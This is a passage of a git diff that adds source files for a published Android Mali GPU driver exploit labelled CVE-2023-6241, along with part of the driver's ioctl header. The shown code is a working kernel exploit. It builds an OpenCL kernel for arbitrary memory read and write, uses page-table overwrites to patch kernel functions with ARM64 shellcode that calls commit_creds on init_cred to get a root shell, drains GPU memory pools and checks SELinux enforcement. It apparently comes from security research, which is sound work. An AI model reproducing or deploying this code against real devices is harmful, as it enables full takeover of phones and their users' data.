__u64 alignment + * @out.timestamp: System wide timestamp (counter) value. + * @out.cycle_counter: GPU cycle counter value. + */ +union kbase_ioctl_get_cpu_gpu_timeinfo { + struct { + __u32 request_flags; + __u32 paddings[7]; + } in; + struct { + __u64 sec; + __u32 nsec; + __u32 padding; + __u64 timestamp; + __u64 cycle_counter; + } out; +}; + +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \ + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo) + +/** + * struct kbase_ioctl_context_priority_check - Check the max possible priority + * @priority: Input priority & output priority + */ + +struct kbase_ioctl_context_priority_check { + __u8 priority; +}; + +#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check) + +/** + * struct kbase_ioctl_set_limited_core_count - Set the limited core count. + * + * @max_core_count: Maximum core count + */ +struct kbase_ioctl_set_limited_core_count { + __u8 max_core_count; +}; + +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \ + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count) + +/** + * struct kbase_ioctl_kinstr_prfcnt_enum_info - Enum Performance counter + * information + * @info_item_size: Performance counter item size in bytes. + * @info_item_count: Performance counter item count in the info_list_ptr. + * @info_list_ptr: Performance counter item list pointer which points to a + * list with info_item_count of items. + * + * On success: returns info_item_size and info_item_count if info_list_ptr is + * NULL, returns performance counter information if info_list_ptr is not NULL. + * On error: returns a negative error code. + */ +struct kbase_ioctl_kinstr_prfcnt_enum_info { + __u32 info_item_size; + __u32 info_item_count; + __u64 info_list_ptr; +}; + +#define KBASE_IOCTL_KINSTR_PRFCNT_ENUM_INFO \ + _IOWR(KBASE_IOCTL_TYPE, 56, struct kbase_ioctl_kinstr_prfcnt_enum_info) + +/** + * struct kbase_ioctl_kinstr_prfcnt_setup - Setup HWC dumper/reader + * @in: input parameters. + * @in.request_item_count: Number of requests in the requests array. + * @in.request_item_size: Size in bytes of each request in the requests array. + * @in.requests_ptr: Pointer to the requests array. + * @out: output parameters. + * @out.prfcnt_metadata_item_size: Size of each item in the metadata array for + * each sample. + * @out.prfcnt_mmap_size_bytes: Size in bytes that user-space should mmap + * for reading performance counter samples. + * + * A fd is returned from the ioctl if successful, or a negative value on error. + */ +union kbase_ioctl_kinstr_prfcnt_setup { + struct { + __u32 request_item_count; + __u32 request_item_size; + __u64 requests_ptr; + } in; + struct { + __u32 prfcnt_metadata_item_size; + __u32 prfcnt_mmap_size_bytes; + } out; +}; + +#define KBASE_IOCTL_KINSTR_PRFCNT_SETUP \ + _IOWR(KBASE_IOCTL_TYPE, 57, union kbase_ioctl_kinstr_prfcnt_setup) + +/*************** + * Pixel ioctls * + ***************/ + +/** + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request + * + * @dur_usec: Duration for GPU to stay awake. + */ +struct kbase_ioctl_apc_request { + __u32 dur_usec; +}; + +#define KBASE_IOCTL_APC_REQUEST \ + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request) + +/** + * struct kbase_ioctl_buffer_liveness_update - Update the live ranges of buffers from previous frame + * + * @live_ranges_address: Array of live ranges + * @live_ranges_count: Number of elements in the live ranges buffer + * @buffer_va_address: Array of buffer base virtual addresses + * @buffer_sizes_address: Array of buffer sizes + * @buffer_count: Number of buffers + * @padding: Unused + */ +struct kbase_ioctl_buffer_liveness_update { + __u64 live_ranges_address; + __u64 live_ranges_count; + __u64 buffer_va_address; + __u64 buffer_sizes_address; + __u64 buffer_count; +}; + +#define KBASE_IOCTL_BUFFER_LIVENESS_UPDATE \ + _IOW(KBASE_IOCTL_TYPE, 67, struct kbase_ioctl_buffer_liveness_update) + +/*************** + * test ioctls * + ***************/ +#if MALI_UNIT_TEST +/* These ioctls are purely for test purposes and are not used in the production + * driver, they therefore may change without notice + */ + +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1) + + +/** + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes + * @bytes_collected: number of bytes read by user + * @bytes_generated: number of bytes generated by tracepoints + */ +struct kbase_ioctl_tlstream_stats { + __u32 bytes_collected; + __u32 bytes_generated; +}; + +#define KBASE_IOCTL_TLSTREAM_STATS \ + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats) + +#endif /* MALI_UNIT_TEST */ + +/* Customer extension range */ +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2) + +/* If the integration needs extra ioctl add them there + * like this: + * + * struct my_ioctl_args { + * .... + * } + * + * #define KBASE_IOCTL_MY_IOCTL \ + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args) + */ + + +/********************************** + * Definitions for GPU properties * + **********************************/ +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0) +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1) +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2) +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3) + +#define KBASE_GPUPROP_PRODUCT_ID 1 +#define KBASE_GPUPROP_VERSION_STATUS 2 +#define KBASE_GPUPROP_MINOR_REVISION 3 +#define KBASE_GPUPROP_MAJOR_REVISION 4 +/* 5 previously used for GPU speed */ +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6 +/* 7 previously used for minimum GPU speed */ +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12 + +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15 + +#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17 + +#define KBASE_GPUPROP_MAX_THREADS 18 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20 +#define KBASE_GPUPROP_MAX_REGISTERS 21 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23 +#define KBASE_GPUPROP_IMPL_TECH 24 + +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32 +#define KBASE_GPUPROP_RAW_AS_PRESENT 33 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37 +#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54 +#define KBASE_GPUPROP_RAW_GPU_ID 55 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60 + +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70 +#define KBASE_GPUPROP_COHERENCY_GROUP_7 71 +#define KBASE_GPUPROP_COHERENCY_GROUP_8 72 +#define KBASE_GPUPROP_COHERENCY_GROUP_9 73 +#define KBASE_GPUPROP_COHERENCY_GROUP_10 74 +#define KBASE_GPUPROP_COHERENCY_GROUP_11 75 +#define KBASE_GPUPROP_COHERENCY_GROUP_12 76 +#define KBASE_GPUPROP_COHERENCY_GROUP_13 77 +#define KBASE_GPUPROP_COHERENCY_GROUP_14 78 +#define KBASE_GPUPROP_COHERENCY_GROUP_15 79 + +#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81 + +#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82 + +#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83 +#define KBASE_GPUPROP_TLS_ALLOC 84 +#define KBASE_GPUPROP_RAW_GPU_FEATURES 85 +#ifdef __cpluscplus +} +#endif + +#endif /* _UAPI_KBASE_IOCTL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.c b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.c new file mode 100644 index 0000000..1774f0e --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.c @@ -0,0 +1,265 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" + +#include "mem_read_write.h" +#include "mempool_utils.h" +#include "firmware_offsets.h" + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22); + int prot = PROT_READ; + if (!read_only) { + alloc.in.flags |= BASE_MEM_PROT_GPU_WR; + prot |= PROT_WRITE; + } + alloc.in.va_pages = va_pages; + alloc.in.commit_pages = commit_pages; + mem_alloc(mali_fd, &alloc); + void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + return region; +} + +static inline uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +static inline uint32_t hi32(uint64_t x) { + return x >> 32; +} + +static uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask & (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +static uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + +struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64) { + int ret = 0; + + const char* source_str64 = + "__kernel void rw_mem(__global unsigned long *va, __global unsigned long *in_out, __global unsigned long *flag) {" + "size_t idx = get_global_id(0);" + "if (flag[idx]) {" + " __global unsigned long *addr = (__global unsigned long*)(va[idx]);" + " addr[0] = in_out[idx];" + "} else {" + " __global unsigned long *addr = (__global unsigned long *)(va[idx]);" + " in_out[idx] = addr[0];" + "}" +"};"; + + const char* source_str32 = + "__kernel void rw_mem(__global unsigned long *va, __global unsigned long *in_out, __global unsigned long *flag) {" + "size_t idx = get_global_id(0);" + "if (flag[idx]) {" + " __global unsigned int *addr = (__global unsigned int*)(va[idx]);" + " addr[0] = (unsigned int)(in_out[idx]);" + "} else {" + " __global unsigned int *addr = (__global unsigned int *)(va[idx]);" + " in_out[idx] = addr[0];" + "}" +"};"; + + const char* source_str = is64 ? source_str64 : source_str32; + + size_t source_size = strlen(source_str); + + cl_mem va = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create va buffer\n"); + } + cl_mem in_out = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create in_out buffer\n"); + } + cl_mem flag = clCreateBuffer(context, CL_MEM_READ_WRITE, + sizeof(uint64_t), NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create flag buffer\n"); + } + + cl_program program = clCreateProgramWithSource(context, 1, (const char**)(&source_str), (const size_t*)(&source_size), &ret); + ret = clBuildProgram(program, 1, device_id, NULL, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to create program\n"); + } + + cl_kernel kernel = clCreateKernel(program, "rw_mem", &ret); + if (ret != CL_SUCCESS) { + err(1, "Failed to create kernel %d\n", ret); + } + printf("kernel success\n"); + ret = clSetKernelArg(kernel, 0, sizeof(cl_mem), (void *)&va); + ret = clSetKernelArg(kernel, 1, sizeof(cl_mem), (void *)&in_out); + ret = clSetKernelArg(kernel, 2, sizeof(cl_mem), (void *)&flag); + if (ret != CL_SUCCESS) { + err(1, "Failed to set kernel arg\n"); + } + struct rw_mem_kernel out = {0}; + out.va = va; + out.in_out = in_out; + out.flag = flag; + out.kernel = kernel; + out.program = program; + return out; +} + +void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t write = 1; + int ret = 0; + ret = clEnqueueWriteBuffer(command_queue, kernel->va, CL_TRUE, 0, sizeof(uint64_t), gpu_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->in_out, CL_TRUE, 0, sizeof(uint64_t), value, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->flag, CL_TRUE, 0, sizeof(uint64_t), &write, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + ret = clEnqueueNDRangeKernel(command_queue, kernel->kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + if (clFlush(command_queue) != CL_SUCCESS) { + err(1, "Falied to flush queue in write_to\n"); + } + usleep(10000); +} + + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = reserved[i]; + uint64_t end = reserved[i] + reserved_size * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + uint64_t this_addr = overwrite_addr + func_offset + code * 4; + uint64_t this_code = shellcode[code]; + write_to(mali_fd, &this_addr, &this_code, command_queue, kernel32); + } + usleep(300000); + } + } + } +} + +uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t read = 0; + int ret = 0; + ret = clEnqueueWriteBuffer(command_queue, kernel->va, CL_TRUE, 0, sizeof(uint64_t), gpu_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel->flag, CL_TRUE, 0, sizeof(uint64_t), &read, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + ret = clEnqueueNDRangeKernel(command_queue, kernel->kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + uint64_t out = 0; + if (clEnqueueReadBuffer(command_queue, kernel->in_out, CL_TRUE, 0, sizeof(uint64_t), &out, 0, NULL, NULL) != CL_SUCCESS) { + err(1, "Failed to read result\n"); + } + if (clFlush(command_queue) != CL_SUCCESS) { + err(1, "Falied to flush queue in write_to\n"); + } + usleep(10000); + return out; +} + +void releaseKernel(struct rw_mem_kernel* kernel) { + clReleaseKernel(kernel->kernel); + clReleaseProgram(kernel->program); + clReleaseMemObject(kernel->va); + clReleaseMemObject(kernel->in_out); + clReleaseMemObject(kernel->flag); + memset(kernel, 0, sizeof(struct rw_mem_kernel)); +} + +void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel) { + uint64_t addr = pgd + OVERWRITE_INDEX * sizeof(uint64_t); + uint64_t invalid = 2; + write_to(mali_fd, &addr, &invalid, command_queue, kernel); +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h new file mode 100644 index 0000000..1906051 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h @@ -0,0 +1,41 @@ +#ifndef MEM_READ_WRITE_H +#define MEM_READ_WRITE_H + +#include "CL/cl.h" +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" + +#define KERNEL_BASE 0x80000000 + +#define PAGE_SHIFT 12 + +#define OVERWRITE_INDEX 256 + +struct rw_mem_kernel { + cl_mem va; + cl_mem in_out; + cl_mem flag; + cl_kernel kernel; + cl_program program; +}; + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group); + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code); + +void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32); + +void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel); + +struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64); + +void releaseKernel(struct rw_mem_kernel* kernel); + +int run_enforce(); + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.c b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.c new file mode 100644 index 0000000..c96b25c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.c @@ -0,0 +1,60 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include + +#include "mempool_utils.h" + +#define POOL_SIZE 16384 + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) { + err(1, "mem_alloc failed\n"); + } +} + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed %d\n", i); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h new file mode 100644 index 0000000..9aa4caa --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h @@ -0,0 +1,20 @@ +#ifndef MEMPOOL_UTILS_H +#define MEMPOOL_UTILS_H + +#include +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" +#include "log_utils.h" + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc); + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va); + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va); + +uint64_t drain_mem_pool(int mali_fd); + +void release_mem_pool(int mali_fd, uint64_t drain); + +#endif